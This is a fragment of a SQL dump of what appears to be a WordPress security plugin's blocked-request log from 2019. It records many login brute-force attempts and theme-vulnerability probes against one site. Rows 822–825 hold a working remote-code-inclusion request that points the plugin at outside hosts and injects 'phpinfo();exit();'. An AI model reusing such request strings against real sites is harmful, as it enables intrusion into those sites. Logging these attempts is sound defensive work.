23:16:50','62.210.83.201','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(597,'2019-03-06 06:11:23','83.110.247.120','http://smithandsmith.co.za/wp-login.php','404shield',''),(598,'2019-03-06 19:23:48','192.200.215.90','http://www.smithandsmith.co.za/wp-content/themes/headway-163/style.css','404shield',''),(599,'2019-03-06 21:39:17','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/headway-161/style.css','404shield',''),(600,'2019-03-07 03:01:04','104.148.40.114','http://smithandsmith.co.za/wp-content/themes/headway-163/style.css','404shield',''),(601,'2019-03-07 05:36:12','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/headway-161/style.css','404shield',''),(602,'2019-03-08 08:07:16','94.23.255.34','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(603,'2019-03-08 08:07:16','94.23.255.34','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(604,'2019-03-08 08:55:37','94.23.255.34','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(605,'2019-03-08 08:55:37','94.23.255.34','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(606,'2019-03-09 03:03:47','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/headway-165/style.css','404shield',''),(607,'2019-03-09 05:55:57','27.96.94.234','http://smithandsmith.co.za/wp-login.php','404shield',''),(608,'2019-03-09 11:35:58','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/headway-165/style.css','404shield',''),(609,'2019-03-09 18:31:31','141.136.189.219','http://smithandsmith.co.za/wp-login.php','404shield',''),(610,'2019-03-09 23:37:27','95.39.174.68','http://smithandsmith.co.za/wp-login.php','404shield',''),(611,'2019-03-11 05:32:36','141.136.167.197','http://smithandsmith.co.za/wp-login.php','404shield',''),(612,'2019-03-11 05:42:04','102.177.65.249','http://smithandsmith.co.za/wp-login.php','404shield',''),(613,'2019-03-11 12:19:43','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/headway-166/style.css','404shield',''),(614,'2019-03-11 17:34:01','114.158.51.154','http://smithandsmith.co.za/wp-login.php','404shield',''),(615,'2019-03-11 19:15:36','181.51.230.93','http://smithandsmith.co.za/wp-login.php','404shield',''),(616,'2019-03-11 20:12:16','94.23.208.210','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(617,'2019-03-11 20:12:16','94.23.208.210','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(618,'2019-03-11 20:42:45','181.80.236.61','http://smithandsmith.co.za/wp-login.php','404shield',''),(619,'2019-03-12 01:40:44','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/headway-166/style.css','404shield',''),(620,'2019-03-12 12:48:47','1.160.35.186','http://smithandsmith.co.za/wp-login.php','404shield',''),(621,'2019-03-12 15:20:15','51.75.160.98','http://smithandsmith.co.za/wp-login.php','404shield',''),(622,'2019-03-12 17:35:26','188.9.72.35','http://smithandsmith.co.za/wp-login.php','404shield',''),(623,'2019-03-13 19:47:05','5.37.222.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(624,'2019-03-14 02:21:22','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/atom/style.css','404shield',''),(625,'2019-03-14 14:04:12','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/atom/style.css','404shield',''),(626,'2019-03-14 14:07:30','5.15.183.225','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(627,'2019-03-14 16:56:35','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/satoshi/upload-file.php','404shield',''),(628,'2019-03-15 04:45:20','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/satoshi/upload-file.php','404shield',''),(629,'2019-03-15 15:31:01','62.210.83.201','http://smithandsmith.co.za/wp-login.php','404shield',''),(630,'2019-03-15 15:31:01','62.210.83.201','http://smithandsmith.co.za/wp-login.php','404shield',''),(631,'2019-03-16 10:06:13','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/ut-strange/addpress/css/style.css','404shield',''),(632,'2019-03-16 17:33:31','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/ut-strange/addpress/css/style.css','404shield',''),(633,'2019-03-17 06:04:34','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','404shield',''),(634,'2019-03-17 16:00:38','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','404shield',''),(635,'2019-03-17 20:33:13','179.179.88.62','http://smithandsmith.co.za/wp-login.php','404shield',''),(636,'2019-03-17 20:55:27','91.121.222.157','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(637,'2019-03-17 20:55:27','91.121.222.157','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(638,'2019-03-18 22:58:27','89.142.4.41','http://smithandsmith.co.za/wp-login.php','404shield',''),(639,'2019-03-18 23:39:49','151.33.63.173','http://smithandsmith.co.za/wp-login.php','404shield',''),(640,'2019-03-19 03:11:38','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/konzept/style.css','404shield',''),(641,'2019-03-19 04:05:22','49.146.44.208','http://smithandsmith.co.za/wp-login.php','404shield',''),(642,'2019-03-19 13:16:40','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/konzept/style.css','404shield',''),(643,'2019-03-19 13:42:59','31.163.52.59','http://smithandsmith.co.za/wp-login.php','404shield',''),(644,'2019-03-19 17:01:32','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','404shield',''),(645,'2019-03-20 04:52:47','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','404shield',''),(646,'2019-03-20 15:52:46','105.101.103.159','http://smithandsmith.co.za/wp-login.php','404shield',''),(647,'2019-03-21 04:28:07','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/famous/style.css','404shield',''),(648,'2019-03-21 19:04:04','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/famous/style.css','404shield',''),(649,'2019-03-22 08:24:46','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/brainstorm/style.css','404shield',''),(650,'2019-03-22 12:08:25','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(651,'2019-03-22 12:08:26','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(652,'2019-03-22 18:42:47','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(653,'2019-03-22 18:42:48','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(654,'2019-03-22 18:54:05','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(655,'2019-03-22 18:54:05','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(656,'2019-03-22 18:54:06','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(657,'2019-03-22 18:54:06','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(658,'2019-03-22 19:01:33','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(659,'2019-03-22 19:01:33','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(660,'2019-03-22 19:01:47','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(661,'2019-03-22 19:01:47','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(662,'2019-03-22 19:01:49','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(663,'2019-03-22 19:01:49','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(664,'2019-03-22 19:01:50','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(665,'2019-03-22 19:01:50','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(666,'2019-03-22 19:04:05','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(667,'2019-03-22 19:04:06','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(668,'2019-03-22 19:14:08','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(669,'2019-03-22 19:14:08','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(670,'2019-03-22 19:14:31','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(671,'2019-03-22 19:14:32','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(672,'2019-03-22 19:15:45','154.124.163.177','http://smithandsmith.co.za/wp-login.php','404shield',''),(673,'2019-03-22 22:35:04','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/brainstorm/style.css','404shield',''),(674,'2019-03-23 00:28:20','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(675,'2019-03-23 00:28:21','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(676,'2019-03-23 00:28:25','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(677,'2019-03-23 00:28:25','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(678,'2019-03-23 00:28:26','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(679,'2019-03-23 00:28:26','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(680,'2019-03-23 00:28:29','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(681,'2019-03-23 00:28:30','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(682,'2019-03-23 00:28:32','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(683,'2019-03-23 00:28:33','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(684,'2019-03-23 00:28:37','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(685,'2019-03-23 00:28:37','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(686,'2019-03-23 00:36:58','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(687,'2019-03-23 00:36:58','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(688,'2019-03-23 00:41:53','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(689,'2019-03-23 00:41:53','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(690,'2019-03-23 00:54:27','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(691,'2019-03-23 00:54:27','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(692,'2019-03-23 01:29:25','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(693,'2019-03-23 01:29:26','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(694,'2019-03-23 03:10:22','112.200.255.25','http://smithandsmith.co.za/wp-login.php','404shield',''),(695,'2019-03-23 08:02:13','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(696,'2019-03-23 08:02:15','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(697,'2019-03-23 10:27:03','77.81.16.196','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(698,'2019-03-23 12:25:23','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(699,'2019-03-23 12:25:25','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(700,'2019-03-23 12:30:52','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(701,'2019-03-23 12:30:52','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(702,'2019-03-23 12:30:53','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(703,'2019-03-23 12:30:54','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(704,'2019-03-23 12:31:04','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(705,'2019-03-23 12:31:04','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(706,'2019-03-23 12:31:04','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(707,'2019-03-23 12:31:05','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(708,'2019-03-23 12:31:05','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(709,'2019-03-23 12:31:05','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(710,'2019-03-23 12:31:22','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(711,'2019-03-23 12:31:23','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(712,'2019-03-23 12:31:34','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(713,'2019-03-23 12:31:35','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(714,'2019-03-23 12:47:04','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(715,'2019-03-23 12:47:05','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(716,'2019-03-23 14:30:28','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(717,'2019-03-23 14:30:29','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(718,'2019-03-23 14:54:12','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/dance-studio/core/libs/','404shield',''),(719,'2019-03-23 18:03:58','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(720,'2019-03-23 18:03:59','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(721,'2019-03-23 18:13:39','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(722,'2019-03-23 18:13:40','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(723,'2019-03-23 18:13:40','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(724,'2019-03-23 18:13:40','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(725,'2019-03-23 18:13:41','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(726,'2019-03-23 18:13:41','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(727,'2019-03-23 18:13:42','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(728,'2019-03-23 18:13:42','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(729,'2019-03-23 18:15:00','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(730,'2019-03-23 18:15:01','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(731,'2019-03-23 18:15:16','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(732,'2019-03-23 18:15:16','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(733,'2019-03-23 18:15:17','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(734,'2019-03-23 18:15:18','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(735,'2019-03-23 18:37:31','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(736,'2019-03-23 18:37:32','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(737,'2019-03-23 20:49:51','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(738,'2019-03-23 20:49:52','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(739,'2019-03-23 23:41:19','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(740,'2019-03-23 23:41:20','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(741,'2019-03-23 23:51:26','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(742,'2019-03-23 23:51:26','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(743,'2019-03-23 23:51:26','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(744,'2019-03-23 23:51:27','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(745,'2019-03-23 23:51:27','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(746,'2019-03-23 23:51:27','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(747,'2019-03-23 23:53:46','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(748,'2019-03-23 23:53:46','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(749,'2019-03-23 23:53:53','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(750,'2019-03-23 23:53:53','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(751,'2019-03-23 23:53:54','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(752,'2019-03-23 23:53:54','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(753,'2019-03-23 23:53:56','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(754,'2019-03-23 23:53:57','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(755,'2019-03-24 00:26:09','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(756,'2019-03-24 00:26:09','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(757,'2019-03-24 03:15:59','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(758,'2019-03-24 03:16:01','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(759,'2019-03-24 05:18:42','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(760,'2019-03-24 05:18:43','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(761,'2019-03-24 05:32:37','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(762,'2019-03-24 05:32:38','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(763,'2019-03-24 05:32:38','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(764,'2019-03-24 05:32:39','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(765,'2019-03-24 05:32:41','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(766,'2019-03-24 05:32:41','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(767,'2019-03-24 05:32:46','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(768,'2019-03-24 05:32:46','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(769,'2019-03-24 05:32:49','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(770,'2019-03-24 05:32:49','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(771,'2019-03-24 05:32:52','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(772,'2019-03-24 05:32:52','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(773,'2019-03-24 05:32:59','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(774,'2019-03-24 05:32:59','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(775,'2019-03-24 06:17:27','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(776,'2019-03-24 06:17:28','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(777,'2019-03-24 07:03:10','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/dance-studio/core/libs/','404shield',''),(778,'2019-03-24 07:58:36','2.50.0.75','http://smithandsmith.co.za/wp-login.php','404shield',''),(779,'2019-03-24 11:14:56','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(780,'2019-03-24 11:14:57','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(781,'2019-03-24 11:14:57','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(782,'2019-03-24 11:14:57','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(783,'2019-03-24 11:14:58','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(784,'2019-03-24 11:14:58','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(785,'2019-03-24 11:14:58','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(786,'2019-03-24 11:14:59','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(787,'2019-03-24 11:15:04','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(788,'2019-03-24 11:15:04','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(789,'2019-03-24 12:11:23','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(790,'2019-03-24 12:11:24','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(791,'2019-03-25 03:19:02','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(792,'2019-03-25 03:19:03','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(793,'2019-03-25 05:12:12','109.227.49.238','http://smithandsmith.co.za/wp-login.php','404shield',''),(794,'2019-03-25 18:58:40','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(795,'2019-03-25 18:58:41','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(796,'2019-03-26 01:41:52','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(797,'2019-03-26 01:41:53','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(798,'2019-03-26 03:23:45','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','404shield',''),(799,'2019-03-26 06:38:33','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/qualifire/style.css','404shield',''),(800,'2019-03-26 07:45:26','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(801,'2019-03-26 07:45:27','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(802,'2019-03-26 08:26:30','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(803,'2019-03-26 08:26:31','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(804,'2019-03-26 10:25:04','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','404shield',''),(805,'2019-03-26 12:23:13','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/qualifire/style.css','404shield',''),(806,'2019-03-26 14:41:07','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(807,'2019-03-26 14:41:09','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(808,'2019-03-26 15:14:16','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(809,'2019-03-26 15:14:17','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(810,'2019-03-26 21:31:25','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(811,'2019-03-26 21:31:26','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(812,'2019-03-26 21:52:48','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(813,'2019-03-26 21:52:49','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(814,'2019-03-27 00:43:59','79.183.7.163','http://smithandsmith.co.za/wp-login.php','404shield',''),(815,'2019-03-27 11:11:54','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(816,'2019-03-27 11:11:56','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(817,'2019-03-27 11:13:51','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(818,'2019-03-27 11:13:52','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(819,'2019-03-27 11:49:46','51.39.94.51','http://smithandsmith.co.za/wp-login.php','404shield',''),(820,'2019-03-27 18:05:30','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(821,'2019-03-27 18:05:32','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(822,'2019-03-27 19:15:19','192.99.0.107','http://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit();','404shield',''),(823,'2019-03-27 19:15:34','192.99.0.107','http://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit();','404shield',''),(824,'2019-03-27 19:16:50','192.185.146.8','https://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit();','404shield',''),(825,'2019-03-27 19:17:00','192.185.146.8','https://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit();','404shield',''),(826,'2019-03-28 00:50:13','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(827,'2019-03-28 00:50:14','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(828,'2019-03-28 00:50:14','128.14.224.41','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(829,'2019-03-28 02:18:12','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/u-design/style.css','404shield',''),(830,'2019-03-28 12:45:11','23.228.81.10','http://www.smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(831,'2019-03-28 18:22:54','169.0.96.220','http://smithandsmith.co.za/wp-login.php','404shield',''),(832,'2019-03-28 20:30:00','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/u-design/style.css','404shield',''),(833,'2019-03-28 23:38:39','149.0.160.77','http://smithandsmith.co.za/wp-login.php','404shield',''),(834,'2019-03-29 02:27:03','23.228.81.10','http://smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(835,'2019-03-29 16:17:13','134.249.48.131','http://smithandsmith.co.za/wp-login.php','404shield',''),(836,'2019-03-29 16:17:13','134.249.48.131','http://smithandsmith.co.za/wp-login.php','404shield',''),(837,'2019-03-29 16:17:13','134.249.48.131','http://smithandsmith.co.za/wp-login.php','404shield',''),(838,'2019-03-30 08:31:58','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/nuance/style.css','404shield',''),(839,'2019-03-30 14:34:20','60.53.202.5','http://smithandsmith.co.za/wp-login.php','404shield',''),(840,'2019-03-30 21:50:55','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/nuance/style.css','404shield',''),(841,'2019-04-02 10:06:47','82.117.210.134','http://smithandsmith.co.za/wp-login.php','404shield',''),(842,'2019-04-02 14:32:33','88.207.45.138','http://smithandsmith.co.za/wp-login.php','404shield',''),(843,'2019-04-02 18:23:22','69.12.72.173','http://smithandsmith.co.za/wp-login.php','404shield',''),(844,'2019-04-02 20:30:31','139.59.61.11','http://smithandsmith.co.za/wp-login.php','404shield',''),(845,'2019-04-02 20:32:38','103.10.191.42','http://smithandsmith.co.za/wp-login.php','404shield',''),(846,'2019-04-02 20:32:46','46.235.40.91','http://smithandsmith.co.za/wp-login.php','404shield',''),(847,'2019-04-02 20:33:50','207.180.210.155','http://smithandsmith.co.za/wp-login.php','404shield',''),(848,'2019-04-03 09:58:52','212.83.190.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(849,'2019-04-03 10:51:34','212.83.190.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(850,'2019-04-03 12:12:36','212.83.190.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(851,'2019-04-03 13:30:55','212.83.190.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(852,'2019-04-03 14:06:56','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(853,'2019-04-03 14:06:57','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(854,'2019-04-03 14:23:12','212.83.190.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(855,'2019-04-03 14:31:36','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(856,'2019-04-03 14:31:37','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(857,'2019-04-03 14:31:37','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(858,'2019-04-03 14:31:37','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(859,'2019-04-03 14:31:37','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(860,'2019-04-03 14:31:38','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(861,'2019-04-03 14:31:43','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(862,'2019-04-03 14:31:43','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(863,'2019-04-03 14:31:45','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(864,'2019-04-03 14:31:45','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(865,'2019-04-03 14:32:28','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(866,'2019-04-03 14:32:29','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(867,'2019-04-03 14:33:05','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(868,'2019-04-03 